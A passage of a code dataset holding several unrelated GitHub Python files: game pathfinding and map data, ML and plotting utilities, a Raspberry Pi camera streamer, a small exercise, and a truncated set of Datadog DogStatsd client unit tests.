bare\n        # tuples would pick the lexicographically smallest coordinate instead)\n        current = min(openSet, key=lambda node: fScore[node])\n        neighbors = neigh(current, gen_maze, len(gen_maze), len(gen_maze[0]))\n        if current == goal:\n            return reconstruct_path(cameFrom, current)\n\n        openSet.remove(current)\n        closedSet.append(current)\n\n        # print(neighbors)\n        for neighbor in neighbors:\n            if neighbor in closedSet:\n                continue # Ignore the neighbor which is already evaluated.\n\n            if neighbor not in openSet:\t# Discover a new node\n                openSet.append(neighbor)\n\n            # This path is the best until now. Record it!\n            cameFrom[neighbor] = current\n            fScore[neighbor] = heuristic(neighbor, goal)\n\n\ndef reconstruct_path(cameFrom, current):\n    total_path = [current]\n    while current in cameFrom:\n        current = cameFrom[current]\n        total_path.append(current)\n    total_path.reverse()\n    return total_path\n\n\n# manhattan distance\ndef heuristic(s, d):\n    sx, sy = s\n    dx, dy = d\n    return abs(dx - sx) + abs(dy - sy)\n\n\ndef neigh(v, m, row, col):\n    n = []\n    if v[0] > 0:\n        node = (v[0] - 1, v[1])\n        if m[v[0] - 1][v[1]] != 2:\n            n.append(node)\n    if v[1] > 0:\n        node = (v[0], v[1] - 1)\n        if m[v[0]][v[1] - 1] != 2:\n            n.append(node)\n    if v[0] < row - 1:\n        node = (v[0] + 1, v[1])\n        if m[v[0] + 1][v[1]] != 2:\n            n.append(node)\n    if v[1] < col - 1:\n        node = (v[0], v[1] + 1)\n        if m[v[0]][v[1] + 1] != 2:\n            n.append(node)\n    return n\n\n\nsprite_positions = [\n    [69.5, 69.5, 3], # AI must be mutable\n\n    # (20.5, 11.5, 2), # green light in front of playerstart\n    # green lights in every room\n    # (18.5, 4.5, 2),\n    # (10.0, 4.5, 2),\n    # (10.0, 12.5, 2),\n    # (3.5, 6.5, 2),\n    # (3.5, 20.5, 2),\n    # (3.5, 14.5, 2),\n    # (14.5, 20.5, 2),\n    (1.5, 1.5, 2),\n    (1.5, 69.5, 2),\n    (69.5, 1.5, 2),\n    (69.5, 69.5, 2),\n\n    # row of pillars in front of wall: fisheye test\n    # (18.5, 10.5, 1),\n    # (18.5, 11.5, 1),\n    # (18.5, 12.5, 1),\n\n    # some barrels around the map\n    # (21.5, 1.5, 0),\n    (15.5, 1.5, 0),\n    (16.0, 1.8, 0),\n    (16.2, 1.2, 0),\n    # (3.5, 2.5, 0),\n    # (9.5, 15.5, 0),\n    # (10.0, 15.1, 0),\n    # (10.5, 15.8, 0)\n]\n\nsprite_zero = []\n\nplayer_start = [\n    (1.5, 1.5, -1, 0, 0, .66)\n    #(1.5, 1.5, 1, -1, 0, .66)\n    #(27, 11.5, -1, 0, 0, 
.66)\n]","repo_name":"scrufulufugus/TWAIn","sub_path":"src/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24844127739","text":"import torch\nimport torch.nn.functional as F \n\n@torch.no_grad()\ndef helper_eval_gpt_ce_losses(model, get_batch, n_class, eval_iter, batch_args):\n out = {}\n for stage in ['train', 'eval']:\n losses = torch.zeros(eval_iter)\n for k in range(eval_iter):\n xb, yb = get_batch(stage=stage, **batch_args)\n \n logits = model(xb)\n mini_batch_loss = F.cross_entropy(input=logits.view(-1, n_class), target=yb.view(-1))\n \n losses[k] = mini_batch_loss.item()\n out[stage] = losses.mean()\n return out","repo_name":"MMoshtaghi/DeepLearning-from-zero-to-GPT-from-scratch-exlpained","sub_path":"helper_eval.py","file_name":"helper_eval.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9737373047","text":"from manim import *\nimport numpy as np\nimport deepdish as dd\n\n\nclass BasisSpline(object):\n def __init__(\n self,\n n_df,\n xrange=(0, 1),\n k=4,\n knots=None,\n normalize=True,\n ):\n self.order = k\n self.N = n_df\n self.xrange = xrange\n if knots is None:\n interior_knots = np.linspace(*xrange, n_df - k + 2)\n dx = interior_knots[1] - interior_knots[0]\n knots = np.concatenate(\n [\n xrange[0] - dx * np.arange(1, k)[::-1],\n interior_knots,\n xrange[1] + dx * np.arange(1, k),\n ]\n )\n self.knots = knots\n self.interior_knots = knots\n assert len(self.knots) == self.N + self.order\n\n self.normalize = normalize\n self.basis_vols = np.ones(self.N)\n if normalize:\n grid = np.linspace(*xrange, 1000)\n grid_bases = np.array(self.bases(grid))\n self.basis_vols = np.array(\n [np.trapz(grid_bases[i, :], grid) for i in range(self.N)]\n )\n\n def norm(self, coefs):\n n = 1.0 / np.sum(self.basis_vols * coefs.flatten()) if self.normalize else 1.0\n return n\n\n def _basis(self, xs, i, k):\n if self.knots[i + k] - self.knots[i] < 1e-6:\n return np.zeros_like(xs)\n elif k == 1:\n v = np.zeros_like(xs)\n v[(xs >= self.knots[i]) & (xs < self.knots[i + 1])] = 1 / (\n self.knots[i + 1] - self.knots[i]\n )\n return v\n else:\n v = (xs - self.knots[i]) * self._basis(xs, i, k - 1) + (\n self.knots[i + k] - xs\n ) * self._basis(xs, i + 1, k - 1)\n return (v * k) / ((k - 1) * (self.knots[i + k] - self.knots[i]))\n\n def _bases(self, xs):\n return [self._basis(xs, i, k=self.order) for i in range(self.N)]\n\n def bases(self, xs):\n return np.concatenate(self._bases(xs)).reshape(self.N, *xs.shape)\n\n def project(self, bases, shape, coefs):\n coefs = coefs.reshape(shape)\n coefs /= np.sum(coefs)\n return np.sum(coefs * bases, axis=0) * self.norm(coefs)\n\n def eval(self, xs, shape, coefs):\n return self.project(self.bases(xs), shape, coefs)\n\n def __call__(self, xs, coefs):\n return self.eval(xs, (-1, 1), coefs)\n\n\nclass BSplineRegressionExample(Scene):\n def construct(self):\n self.nknot_list = [6,8,10,12,16,20,30,40]\n self.data_files = [f'media/data/BasisSplineExample_{i}knots_60train_0.2sigma_inference_data.h5' for i in self.nknot_list]\n self.posteriors = {}\n self.data = None\n for data_file,n in zip(self.data_files,[6,8,10,12,16,20,30,40]):\n data = dd.io.load(data_file)\n self.posteriors[n] = data['samples']\n if self.data is None:\n self.data = data['data']\n self.show_data()\n self.wait(3)\n \n for n in self.nknot_list:\n 
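# For each knot count, animate posterior spline draws, pause, then clear the scene.\n            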
self.show_posterior(n)\n            self.wait(1)\n            self.clear_posterior()\n        \n    def show_data(self):\n        return\n    \n    def animate_spline_curve(self,dmat,cs):\n        return\n    \n    def show_posterior(self,n,N_plot=50):\n        dmat = BasisSpline(n, xrange=(-1.0,1.0)).bases(self.data['X_test']).T\n        self.animate_spline_curve(dmat,cs=np.ones(dmat.shape[1]))\n        for _ in range(N_plot):\n            i = np.random.choice(self.posteriors[n][\"cs\"].shape[0],1)[0]\n            cs = self.posteriors[n][\"cs\"][i]\n            self.animate_spline_curve(dmat,cs)\n        return\n    \n    def clear_posterior(self):\n        return","repo_name":"FarrOutLab/FarrLabManimations","sub_path":"animations/BSplineInferenceExample/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"18239099131","text":"import random\n\nfrom Snake import Game as game\nfrom time import sleep\nimport pygame\nfrom pygame.locals import *\n\nslowMode = True\nnumRuns = 5\n\ndef random_game():\n    averageScore = 0\n    for _ in range(numRuns):\n        env = game()\n        env.reset()\n        action = -1\n\n        max_moves = 69420\n\n        for _ in range(max_moves):\n            action = random.randrange(0, 3)\n\n            if slowMode:\n                sleep(0.1)\n                env.render()\n\n            done, score = env.step(action)\n\n            if done:\n                print('Score: ', score)\n                averageScore += score\n                break\n\n    print('Average score: ', averageScore/numRuns)\n\nif __name__ == \"__main__\":\n    random_game()","repo_name":"twang35/Snek","sub_path":"theSchlort/theSchlort.py","file_name":"theSchlort.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"37624167185","text":"params={\n    'enc_type': 'lstm',\n    'dec_type': 'lstm',\n    'pred_linear_bias': True,\n    'nz': 16,\n    'ni': 200,\n    'enc_nh': 512,\n    'dec_nh': 512,\n    'dec_dropout_in': 0.5,\n    'dec_dropout_out': 0.5,\n    'dec_dropout': 0.5, # for unigram decoders\n    'batch_size': 64,\n    'epochs': 200,\n    'test_nepoch': 5,\n    'train_data': 'datasets/yahoo/train.txt.100k',\n    'val_data': 'datasets/yahoo/valid.txt.10k',\n    'test_data': 'datasets/yahoo/test.txt.10k',\n    'vocab_file': 'datasets/yahoo/vocab.txt',\n    \"label\": True,\n}\n","repo_name":"tombosc/exps-s2svae","sub_path":"config/config_yahoo.py","file_name":"config_yahoo.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"}
{"seq_id":"32352948011","text":"# Look at the distribution of STRING-DB scores for each keyword\n\n# %%\nimport os\n\nimport pandas as pd\nimport seaborn as sns\nfrom dotenv import load_dotenv\n\nfrom src.plot.foldseek_stringdb_investigation.plot_utils import (\n    construct_plotting_data,\n    plot_boxplot_by_keyword,\n)\nfrom src.plot.interaction_metrics.representative import (\n    convert_to_dict_exp_pair_by_keyword,\n    target_report,\n)\nfrom src.util.similarity_strategy import (\n    FoldSeekTMScore,\n    Jaccard,\n    Simpson,\n)\nfrom src.util.metrics import Metrics\n\nsns.set(font_scale=1.4)\n\nload_dotenv()\nPROJECT_PATH = os.environ[\"PROJECT_PATH\"]\n\nSAVEDIR = os.path.join(\n    PROJECT_PATH,\n    \"src/plot/img\",\n    \"foldseek_stringdb_investigation\",\n    \"keyword_foldseekdb\",\n)\n\nif not os.path.exists(SAVEDIR):\n    os.makedirs(SAVEDIR)\n\n    # %%\n\nTHRESHOLD_GENE_NUM = 1000\nBIOSAMPLE = \"HepG2\"\n\n\nreport = target_report(THRESHOLD_GENE_NUM, BIOSAMPLE)\n\ndata: pd.DataFrame = Metrics(report)(\n    [\n        FoldSeekTMScore(symmetric_method=\"min\"),\n        FoldSeekTMScore(symmetric_method=\"max\"),\n        
FoldSeekTMScore(symmetric_method=\"average\"),\n        Simpson(),\n        Jaccard(),\n    ],\n) # type: ignore\n# %%\nkeyword_experiment_pair = convert_to_dict_exp_pair_by_keyword(data)\n# %%\n\ninvestigation_metrics = [\n    \"foldseek_tmscore_min\",\n    \"foldseek_tmscore_max\",\n    \"foldseek_tmscore_average\",\n]\nplot_data = construct_plotting_data(\n    data, keyword_experiment_pair, investigation_metrics\n)\n\nfor met in investigation_metrics:\n    fig = plot_boxplot_by_keyword(plot_data, met)\n    fig.savefig(os.path.join(SAVEDIR, f\"boxplot_{met}.png\"), bbox_inches=\"tight\")\n\n# %%\n","repo_name":"edge2992/eCLIP_ENCODE","sub_path":"src/plot/foldseek_stringdb_investigation/keyword_foldseek.py","file_name":"keyword_foldseek.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"28817182417","text":"# camera.py\nimport time\nimport io\nimport threading\nimport picamera\n\nclass Camera(object):\n    thread = None\n    frame = None\n    last_access = 0\n    camera = picamera.PiCamera()\n\n    def initialize(self):\n        if Camera.thread is None:\n            Camera.thread = threading.Thread(target=self._thread)\n            Camera.thread.start()\n\n            # wait until the first frame has been generated\n            while self.frame is None:\n                pass\n\n    def get_frame(self):\n        Camera.last_access = time.time()\n        self.initialize()\n        return self.frame\n\n    def close_cam(self):\n        self.camera.close()\n\n    @classmethod\n    def _thread(cls):\n        cls.camera.resolution = (320, 240)\n        cls.camera.hflip = True\n        cls.camera.vflip = True\n\n        cls.camera.start_preview()\n        cls.camera.annotate_text_size = 50\n        cls.camera.annotate_text = \"Smart Farm\"\n        cls.camera.annotate_foreground = picamera.Color('Green')\n\n        time.sleep(2)\n\n        stream = io.BytesIO()\n        \n        # Capture images continuously from the camera \n        # as an infinite iterator.\n        for foo in cls.camera.capture_continuous(stream, 'jpeg',\n                                                 use_video_port=True):\n            stream.seek(0)\n            cls.frame = stream.read()\n\n            stream.seek(0)\n            stream.truncate()\n\n            # exit if there has been no access for more than 10 seconds\n            if time.time() - cls.last_access > 10:\n                break\n\n            # 100 ms delay (10 fps)\n            time.sleep(0.1)\n\n        cls.thread = None","repo_name":"1994wjdwodbs/SmartFarm_Project","sub_path":"Flask/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"69875425050","text":"\"\"\" Write a program to accept a range from the user and print all odd numbers in the same. Hint: Don't use any arithmetic operator.\nAccept 2 values. Use bitwise. 
Do validation for upper & lower numbers \"\"\"\n\ndef IsOdd(num):\n    return ((num & 1) == 1)\n\n\"\"\" return num%2 == 1 \"\"\"\n\n# expects comma-separated input such as 3,9\nlb,ub = eval(input(\"Please enter two numbers\"))\nprint(lb,ub)\n\nif (lb < ub):\n    for x in range(lb,ub+1): # include the upper bound of the range\n        if IsOdd(x):\n            print(\"%d is an odd number\" %x)\n    \nelse:\n    print(\"Incorrect range\")\n    \n\n","repo_name":"nmomaya/Python_Assignment","sub_path":"Assignment7_Class.py","file_name":"Assignment7_Class.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"47763740204","text":"from collections import deque\nfrom contextlib import closing\nfrom threading import Thread\nimport errno\nimport os\nimport shutil\nimport socket\nimport tempfile\nimport threading\nimport time\nimport unittest\nimport warnings\n\n# Third-party libraries\nimport mock\nfrom mock import call, Mock, mock_open, patch\nimport pytest\n\n# Datadog libraries\nfrom datadog import initialize, statsd\nfrom datadog import __version__ as version\nfrom datadog.dogstatsd.base import DEFAULT_FLUSH_INTERVAL, DogStatsd, MIN_SEND_BUFFER_SIZE, UDP_OPTIMAL_PAYLOAD_LENGTH, UDS_OPTIMAL_PAYLOAD_LENGTH\nfrom datadog.dogstatsd.context import TimedContextManagerDecorator\nfrom datadog.util.compat import is_higher_py35, is_p3k\nfrom tests.util.contextmanagers import preserve_environment_variable, EnvVars\nfrom tests.unit.dogstatsd.fixtures import load_fixtures\n\n\nclass FakeSocket(object):\n    \"\"\" A fake socket for testing. \"\"\"\n\n    FLUSH_GRACE_PERIOD = 0.2\n\n    def __init__(self, flush_interval=DEFAULT_FLUSH_INTERVAL):\n        self.payloads = deque()\n\n        self._flush_interval = flush_interval\n        self._flush_wait = False\n        self.timeout = () # unit tuple = settimeout was not called\n\n    def send(self, payload):\n        if is_p3k():\n            assert isinstance(payload, bytes)\n        else:\n            assert isinstance(payload, str)\n\n        self.payloads.append(payload)\n\n    def recv(self, count=1, reset_wait=False, no_wait=False):\n        # Initial receive should wait for the flush thread timeout unless we\n        # specifically want either a follow-up wait or no waiting at all\n        if not self._flush_wait or reset_wait:\n            if not no_wait:\n                time.sleep(self._flush_interval+self.FLUSH_GRACE_PERIOD)\n            self._flush_wait = True\n\n        if count > len(self.payloads):\n            return None\n\n        out = []\n        for _ in range(count):\n            out.append(self.payloads.popleft().decode('utf-8'))\n        return '\\n'.join(out)\n\n    def close(self):\n        pass\n\n    def __repr__(self):\n        return str(self.payloads)\n\n    def settimeout(self, timeout):\n        self.timeout = timeout\n\nclass BrokenSocket(FakeSocket):\n    def __init__(self, error_number=None):\n        super(BrokenSocket, self).__init__()\n\n        self.error_number = error_number\n\n    def send(self, payload):\n        error = socket.error(\"Socket error [Errno {}]\".format(self.error_number))\n        if self.error_number:\n            error.errno = self.error_number\n\n        raise error\n\n\nclass OverflownSocket(BrokenSocket):\n\n    def __init__(self):\n        super(OverflownSocket, self).__init__(errno.EAGAIN)\n\n\ndef telemetry_metrics(metrics=1, events=0, service_checks=0, bytes_sent=0, bytes_dropped_writer=0, packets_sent=1, packets_dropped_writer=0, transport=\"udp\", tags=\"\", bytes_dropped_queue=0, packets_dropped_queue=0):\n    tags = \",\" + tags if tags else \"\"\n\n    return \"\\n\".join([\n        \"datadog.dogstatsd.client.metrics:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(metrics, version, transport, tags),\n        
\"datadog.dogstatsd.client.events:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(events, version, transport, tags),\n \"datadog.dogstatsd.client.service_checks:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(service_checks, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_sent:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_sent, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_dropped:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_dropped_queue + bytes_dropped_writer, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_dropped_queue:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_dropped_queue, version, transport, tags),\n \"datadog.dogstatsd.client.bytes_dropped_writer:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(bytes_dropped_writer, version, transport, tags),\n \"datadog.dogstatsd.client.packets_sent:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_sent, version, transport, tags),\n \"datadog.dogstatsd.client.packets_dropped:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_dropped_queue + packets_dropped_writer, version, transport, tags),\n \"datadog.dogstatsd.client.packets_dropped_queue:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_dropped_queue, version, transport, tags),\n \"datadog.dogstatsd.client.packets_dropped_writer:{}|c|#client:py,client_version:{},client_transport:{}{}\".format(packets_dropped_writer, version, transport, tags),\n ]) + \"\\n\"\n\n\nclass TestDogStatsd(unittest.TestCase):\n METRIC_TYPE_MAP = {\n 'gauge': { 'id': 'g' },\n 'timing': { 'id': 'ms' },\n }\n\n def setUp(self):\n \"\"\"\n Set up a default Dogstatsd instance and mock the proc filesystem.\n \"\"\"\n #\n self.statsd = DogStatsd(telemetry_min_flush_interval=0)\n self.statsd.socket = FakeSocket()\n self.statsd._reset_telemetry()\n\n # Mock the proc filesystem\n route_data = load_fixtures('route')\n self._procfs_mock = patch('datadog.util.compat.builtins.open', mock_open())\n self._procfs_mock.start().return_value.readlines.return_value = route_data.split(\"\\n\")\n\n def tearDown(self):\n \"\"\"\n Unmock the proc filesystem.\n \"\"\"\n self._procfs_mock.stop()\n\n def assert_equal_telemetry(self, expected_payload, actual_payload, telemetry=None):\n if telemetry is None:\n telemetry = telemetry_metrics(bytes_sent=len(expected_payload))\n\n if expected_payload:\n expected_payload = \"\\n\".join([expected_payload, telemetry])\n else:\n expected_payload = telemetry\n\n self.maxDiff = None\n return self.assertEqual(expected_payload, actual_payload)\n\n def send_and_assert(\n self,\n dogstatsd,\n expected_metrics,\n last_telemetry_size=0,\n buffered=False,\n ):\n \"\"\"\n Send and then asserts that a chain of metrics arrive in the right order\n and with expected telemetry values.\n \"\"\"\n\n expected_messages = []\n for metric_type, metric_name, metric_value in expected_metrics:\n # Construct the expected message data\n metric_type_id = TestDogStatsd.METRIC_TYPE_MAP[metric_type]['id']\n expected_messages.append(\n \"{}:{}|{}\\n\".format(metric_name, metric_value, metric_type_id)\n )\n\n # Send the value\n getattr(dogstatsd, metric_type)(metric_name, metric_value)\n\n # Sanity check\n if buffered:\n # Ensure that packets didn't arrive immediately if we are expecting\n # buffering behavior\n self.assertIsNone(dogstatsd.socket.recv(2, no_wait=True))\n\n metrics = 1\n if 
buffered:\n            metrics = len(expected_messages)\n\n        if buffered:\n            expected_messages = [ ''.join(expected_messages) ]\n\n        for message in expected_messages:\n            packets_sent = 1\n            # For all non-initial packets, our current telemetry stats will\n            # contain the metadata for the last telemetry packet as well.\n            if last_telemetry_size > 0:\n                packets_sent += 1\n\n            expected_metrics=telemetry_metrics(\n                metrics=metrics,\n                packets_sent=packets_sent,\n                bytes_sent=len(message) + last_telemetry_size\n            )\n            self.assert_equal_telemetry(\n                message,\n                dogstatsd.socket.recv(2, no_wait=not buffered, reset_wait=True),\n                telemetry=expected_metrics,\n            )\n            last_telemetry_size = len(expected_metrics)\n\n        return last_telemetry_size\n\n    def assert_almost_equal(self, val1, val2, delta):\n        \"\"\"\n        Calculates a delta between first and second value and ensures\n        that this difference falls within the delta range\n        \"\"\"\n        return self.assertTrue(\n            0 <= abs(val1 - val2) <= delta,\n            \"Absolute difference of {} and {} ({}) is not within {}\".format(\n                val1,\n                val2,\n                abs(val1-val2),\n                delta,\n            ),\n        )\n\n    def recv(self, *args, **kwargs):\n        return self.statsd.socket.recv(*args, **kwargs)\n\n    def test_initialization(self):\n        \"\"\"\n        `initialize` overrides `statsd` default instance attributes.\n        \"\"\"\n        options = {\n            'statsd_host': \"myhost\",\n            'statsd_port': 1234\n        }\n\n        # Default values\n        self.assertEqual(statsd.host, \"localhost\")\n        self.assertEqual(statsd.port, 8125)\n\n        # After initialization\n        initialize(**options)\n        self.assertEqual(statsd.host, \"myhost\")\n        self.assertEqual(statsd.port, 1234)\n\n        # Add namespace\n        options['statsd_namespace'] = \"mynamespace\"\n        initialize(**options)\n        self.assertEqual(statsd.host, \"myhost\")\n        self.assertEqual(statsd.port, 1234)\n        self.assertEqual(statsd.namespace, \"mynamespace\")\n\n        # Set `statsd` host to the system's default route\n        initialize(statsd_use_default_route=True, **options)\n        self.assertEqual(statsd.host, \"172.17.0.1\")\n        self.assertEqual(statsd.port, 1234)\n\n        # Add UNIX socket\n        options['statsd_socket_path'] = '/var/run/dogstatsd.sock'\n        initialize(**options)\n        self.assertEqual(statsd.socket_path, options['statsd_socket_path'])\n        self.assertIsNone(statsd.host)\n        self.assertIsNone(statsd.port)\n\n    def test_dogstatsd_initialization_with_env_vars(self):\n        \"\"\"\n        Dogstatsd can retrieve its config from env vars when\n        not provided in constructor.\n        \"\"\"\n        # Setup\n        with preserve_environment_variable('DD_AGENT_HOST'):\n            os.environ['DD_AGENT_HOST'] = 'myenvvarhost'\n            with preserve_environment_variable('DD_DOGSTATSD_PORT'):\n                os.environ['DD_DOGSTATSD_PORT'] = '4321'\n                dogstatsd = DogStatsd()\n\n        # Assert\n        self.assertEqual(dogstatsd.host, \"myenvvarhost\")\n        self.assertEqual(dogstatsd.port, 4321)\n\n    def test_default_route(self):\n        \"\"\"\n        Dogstatsd host can be dynamically set to the default route.\n        \"\"\"\n        self.assertEqual(\n            DogStatsd(use_default_route=True).host,\n            \"172.17.0.1\"\n        )\n\n    def test_set(self):\n        self.statsd.set('set', 123)\n        self.assert_equal_telemetry('set:123|s\\n', self.recv(2))\n\n    def test_gauge(self):\n        self.statsd.gauge('gauge', 123.4)\n        self.assert_equal_telemetry('gauge:123.4|g\\n', self.recv(2))\n\n    def test_counter(self):\n        self.statsd.increment('page.views')\n        self.statsd.flush()\n        self.assert_equal_telemetry('page.views:1|c\\n', self.recv(2))\n\n        self.statsd._reset_telemetry()\n        self.statsd.increment('page.views', 11)\n        self.statsd.flush()\n        self.assert_equal_telemetry('page.views:11|c\\n', self.recv(2))\n\n        
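# Reset client-side telemetry between sub-cases so each assertion checks fresh counters.\n        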
self.statsd._reset_telemetry()\n self.statsd.decrement('page.views')\n self.statsd.flush()\n self.assert_equal_telemetry('page.views:-1|c\\n', self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.decrement('page.views', 12)\n self.statsd.flush()\n self.assert_equal_telemetry('page.views:-12|c\\n', self.recv(2))\n\n def test_histogram(self):\n self.statsd.histogram('histo', 123.4)\n self.assert_equal_telemetry('histo:123.4|h\\n', self.recv(2))\n\n def test_pipe_in_tags(self):\n self.statsd.gauge('gt', 123.4, tags=['pipe|in:tag', 'red'])\n self.assert_equal_telemetry('gt:123.4|g|#pipe_in:tag,red\\n', self.recv(2))\n\n def test_tagged_gauge(self):\n self.statsd.gauge('gt', 123.4, tags=['country:china', 'age:45', 'blue'])\n self.assert_equal_telemetry('gt:123.4|g|#country:china,age:45,blue\\n', self.recv(2))\n\n def test_tagged_counter(self):\n self.statsd.increment('ct', tags=[u'country:españa', 'red'])\n self.assert_equal_telemetry(u'ct:1|c|#country:españa,red\\n', self.recv(2))\n\n def test_tagged_histogram(self):\n self.statsd.histogram('h', 1, tags=['red'])\n self.assert_equal_telemetry('h:1|h|#red\\n', self.recv(2))\n\n def test_sample_rate(self):\n # Disabling telemetry since sample_rate imply randomness\n self.statsd._telemetry = False\n\n self.statsd.increment('c', sample_rate=0)\n self.assertFalse(self.recv())\n\n for _ in range(10000):\n self.statsd.increment('sampled_counter', sample_rate=0.3)\n\n self.statsd.flush()\n\n total_metrics = 0\n payload = self.recv()\n while payload:\n metrics = payload.rstrip('\\n').split('\\n')\n for metric in metrics:\n self.assertEqual('sampled_counter:1|c|@0.3', metric)\n total_metrics += len(metrics)\n payload = self.recv()\n\n self.assert_almost_equal(3000, total_metrics, 150)\n\n def test_default_sample_rate(self):\n # Disabling telemetry since sample_rate imply randomness\n self.statsd._telemetry = False\n\n self.statsd.default_sample_rate = 0.3\n for _ in range(10000):\n self.statsd.increment('sampled_counter')\n\n total_metrics = 0\n payload = self.recv()\n while payload:\n metrics = payload.rstrip('\\n').split('\\n')\n for metric in metrics:\n self.assertEqual('sampled_counter:1|c|@0.3', metric)\n\n total_metrics += len(metrics)\n payload = self.recv()\n\n self.assert_almost_equal(3000, total_metrics, 150)\n\n def test_tags_and_samples(self):\n # Disabling telemetry since sample_rate imply randomness\n self.statsd._telemetry = False\n\n for _ in range(100):\n self.statsd.gauge('gst', 23, tags=[\"sampled\"], sample_rate=0.9)\n\n self.assertEqual('gst:23|g|@0.9|#sampled', self.recv().split('\\n')[0])\n\n def test_timing(self):\n self.statsd.timing('t', 123)\n self.assert_equal_telemetry('t:123|ms\\n', self.recv(2))\n\n def test_event(self):\n self.statsd.event(\n 'Title',\n u'L1\\nL2',\n priority='low',\n date_happened=1375296969,\n )\n event2 = u'_e{5,6}:Title|L1\\\\nL2|d:1375296969|p:low\\n'\n self.assert_equal_telemetry(\n event2,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event2),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.event('Title', u'♬ †øU †øU ¥ºu T0µ ♪',\n aggregation_key='key', tags=['t1', 't2:v2'])\n event3 = u'_e{5,32}:Title|♬ †øU †øU ¥ºu T0µ ♪|k:key|#t1,t2:v2\\n'\n self.assert_equal_telemetry(\n event3,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event3),\n ),\n )\n\n def test_unicode_event(self):\n self.statsd.event(\n 'my.prefix.Delivery - Daily Settlement Summary Report Delivery — Invoice 
Cloud succeeded',\n 'Delivered — destination.csv')\n event = u'_e{89,29}:my.prefix.Delivery - Daily Settlement Summary Report Delivery — Invoice Cloud succeeded|' + \\\n u'Delivered — destination.csv\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n # Positional arg names should match threadstats\n def test_event_matching_signature(self):\n self.statsd.event(title=\"foo\", message=\"bar1\")\n event = u'_e{3,4}:foo|bar1\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n def test_event_constant_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n self.statsd.event('Title', u'L1\\nL2', priority='low', date_happened=1375296969)\n event = u'_e{5,6}:Title|L1\\\\nL2|d:1375296969|p:low|#bar:baz,foo\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(event),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.event('Title', u'♬ †øU †øU ¥ºu T0µ ♪',\n aggregation_key='key', tags=['t1', 't2:v2'])\n event = u'_e{5,32}:Title|♬ †øU †øU ¥ºu T0µ ♪|k:key|#t1,t2:v2,bar:baz,foo\\n'\n self.assert_equal_telemetry(\n event,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(event),\n ),\n )\n\n def test_event_payload_error(self):\n def func():\n # define an event payload that is > 8 * 1024\n message = [\"l\" for i in range(8 * 1024)]\n message = \"\".join(message)\n payload = {\"title\": \"title\", \"message\": message}\n\n self.statsd.event(**payload)\n\n # check that the method fails when the payload is too large\n with pytest.raises(ValueError):\n func()\n\n # check that the method does not fail with a small payload\n self.statsd.event(\"title\", \"message\")\n\n\n def test_service_check(self):\n now = int(time.time())\n self.statsd.service_check(\n 'my_check.name', self.statsd.WARNING,\n tags=['key1:val1', 'key2:val2'], timestamp=now,\n hostname='i-abcd1234', message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\")\n check = u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#key1:val1,key2:val2|m:{2}'.format(self.statsd.WARNING, now, u'♬ †øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪\\n')\n self.assert_equal_telemetry(\n check,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n bytes_sent=len(check),\n ),\n )\n\n def test_service_check_constant_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n now = int(time.time())\n self.statsd.service_check(\n 'my_check.name', self.statsd.WARNING,\n timestamp=now,\n hostname='i-abcd1234', message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\")\n check = 